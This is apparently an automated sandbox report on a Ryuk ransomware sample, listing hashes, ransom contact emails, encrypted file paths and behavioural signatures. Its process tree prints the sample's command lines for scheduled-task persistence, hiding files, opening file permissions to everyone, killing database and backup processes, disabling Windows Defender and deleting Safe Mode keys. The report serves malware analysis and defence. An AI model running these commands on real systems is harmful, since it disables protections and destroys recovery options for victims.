Analysis
max time kernel: 179s
max time network: 248s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-11-2022 11:00
Static task: static1
Behavioral task: behavioral1
Sample: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
Resource: win7-20220812-en
Behavioral task: behavioral2
Sample: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
Resource: win10v2004-20220812-en
General
Target: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
Size: 885KB
MD5: 622bc38dee08e70e91e2be32a58b6d1f
SHA1: 7cfec4859fa7ca178095983b3f174f842a44b0c2
SHA256: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a
SHA512: 176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d
SSDEEP: 12288:BdJPiMwyM02Jl5YqWYgeWYg955/155/0QebUlAAszsK6Qo1Rn6X:BPiMtklagQKUKRzsK6QmN6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
RyanRinse@mailfence.com
RyanRinse@firemail.de
Signatures
- Ryuk
  Ransomware distributed via existing botnets, often Trickbot or Emotet.
- Disables Task Manager via registry modification
- Drops startup file (3 IoCs)
  Processes: attrib.exe, cmd.exe
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (attrib.exe)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (cmd.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (cmd.exe)
- Modifies file permissions (1 TTPs, 1 IoCs)
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
  File opened (read-only) by be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe, in the order logged:
  \??\M: \??\R: \??\Z: \??\O: \??\P: \??\Q: \??\S: \??\Y: \??\E: \??\I: \??\B: \??\K: \??\L: \??\N: \??\A: \??\X: \??\G: \??\H: \??\J: \??\V: \??\W: \??\F: \??\T: \??\U:
- Drops file in Program Files directory (64 IoCs)
  Processes: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
  All 64 entries are "File opened for modification" by be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe:
  C:\Program Files\7-Zip\Lang\an.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\Lang\fur.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\Lang\ne.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\Lang\va.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Common Files\microsoft shared\ClickToRun\SubsystemController.man.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[RyanRinse@mailfence.com].RYK
  C:\Program Files\ApproveRegister.asx.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\Lang\hu.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\Lang\th.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\include\jni.h.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\Lang\vi.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\trusted.libraries.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\config.ini.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\dnsns.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\Lang\tr.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\Lang\ps.txt.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.[RyanRinse@mailfence.com].RYK
  C:\Program Files\RegisterWrite.dwg.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar.[RyanRinse@mailfence.com].RYK
  C:\Program Files\7-Zip\7z.sfx.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.[RyanRinse@mailfence.com].RYK
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar.[RyanRinse@mailfence.com].RYK
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTPs, 4 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes (pid, process): 2692 schtasks.exe; 1352 schtasks.exe; 1740 schtasks.exe; 2432 schtasks.exe
- Kills process with taskkill (2 IoCs)
  Processes (pid, process): 2752 taskkill.exe; 3380 taskkill.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid, process): 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe, logged for all 64 IoCs
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process): Token: SeDebugPrivilege 2752 taskkill.exe; Token: SeDebugPrivilege 3380 taskkill.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe, cmd.exe
  32 distinct writes (pid, process, target process), each logged twice in the report:
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 4824 cmd.exe
  PID 4824 cmd.exe wrote to memory of 1740 schtasks.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 4184 cmd.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 3292 cmd.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 4828 cmd.exe
  PID 4828 cmd.exe wrote to memory of 2432 schtasks.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 1560 cmd.exe
  PID 1560 cmd.exe wrote to memory of 4944 attrib.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 920 cmd.exe
  PID 920 cmd.exe wrote to memory of 2692 schtasks.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 4736 cmd.exe
  PID 4736 cmd.exe wrote to memory of 1352 schtasks.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 116 cmd.exe
  PID 116 cmd.exe wrote to memory of 1780 attrib.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 3552 cmd.exe
  PID 3552 cmd.exe wrote to memory of 1748 attrib.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 1920 cmd.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 3064 cmd.exe
  PID 1920 cmd.exe wrote to memory of 1384 cmd.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 3828 cmd.exe
  PID 3828 cmd.exe wrote to memory of 3580 cmd.exe
  PID 3064 cmd.exe wrote to memory of 3508 reg.exe
  PID 3828 cmd.exe wrote to memory of 2752 taskkill.exe
  PID 1384 cmd.exe wrote to memory of 4720 icacls.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 1188 cmd.exe
  PID 3580 cmd.exe wrote to memory of 3380 taskkill.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 2304 cmd.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 4964 cmd.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 3504 cmd.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 1048 cmd.exe
  PID 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe wrote to memory of 1904 cmd.exe
  PID 1904 cmd.exe wrote to memory of 4960 reg.exe
- Views/modifies file attributes (1 TTPs, 3 IoCs)
  Processes (pid, process): 4944 attrib.exe; 1780 attrib.exe; 1748 attrib.exe
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe"
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\schtasks.exe
  Command line: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  - Creates scheduled task(s)
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  - Drops startup file
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\schtasks.exe
  Command line: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  - Creates scheduled task(s)
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\attrib.exe
  Command line: attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  - Drops startup file
  - Views/modifies file attributes
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\schtasks.exe
  Command line: schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
  - Creates scheduled task(s)
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\schtasks.exe
  Command line: schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
  - Creates scheduled task(s)
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\attrib.exe
  Command line: attrib +h +s ryuk.exe
  - Views/modifies file attributes
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\attrib.exe
  Command line: attrib +h +s C:\ProgramData\ryuk.exe
  - Views/modifies file attributes
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\cmd.exe
  Command line: cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  - Suspicious use of WriteProcessMemory
-
[depth 4] C:\Windows\system32\icacls.exe
  Command line: icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  - Modifies file permissions
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\cmd.exe
  Command line: cmd.exe /c taskkill /t /f /im sql*
  - Suspicious use of WriteProcessMemory
-
[depth 4] C:\Windows\system32\taskkill.exe
  Command line: taskkill /t /f /im sql*
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\system32\taskkill.exe
  Command line: taskkill /f /t /im veeam*
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\reg.exe
  Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\reg.exe
  Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
-
[depth 3] C:\Windows\system32\reg.exe
  Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
-
[depth 3] C:\Windows\system32\reg.exe
  Command line: reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
-
[depth 2] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
-
[depth 3] C:\Windows\system32\reg.exe
  Command line: reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads